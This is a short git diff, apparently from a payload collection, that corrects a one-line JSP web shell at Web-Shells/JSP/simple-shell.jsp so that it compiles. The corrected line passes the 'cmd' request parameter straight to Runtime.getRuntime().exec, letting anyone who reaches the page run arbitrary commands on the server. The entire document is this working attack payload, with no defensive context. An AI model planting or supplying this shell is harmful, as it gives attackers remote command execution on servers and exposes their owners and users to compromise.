diff --git a/Web-Shells/JSP/simple-shell.jsp b/Web-Shells/JSP/simple-shell.jsp index dd21aa97..f375608a 100644 --- a/Web-Shells/JSP/simple-shell.jsp +++ b/Web-Shells/JSP/simple-shell.jsp @@ -1,3 +1,3 @@ <% -Runtime.getruntime().exec(request.getParameter("cmd")) +Runtime.getRuntime().exec(request.getParameter("cmd")); %>